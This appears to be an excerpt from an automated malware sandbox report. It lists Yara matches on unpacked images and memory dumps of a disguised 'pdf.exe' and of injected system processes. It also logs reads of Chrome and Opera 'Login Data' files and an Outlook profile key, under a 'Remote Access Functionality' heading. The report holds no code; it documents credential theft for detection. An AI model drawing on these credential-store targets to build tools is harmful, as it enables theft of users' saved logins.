Source: Yara match File source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\ipconfig.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\ipconfig.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Source: Yara match File source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY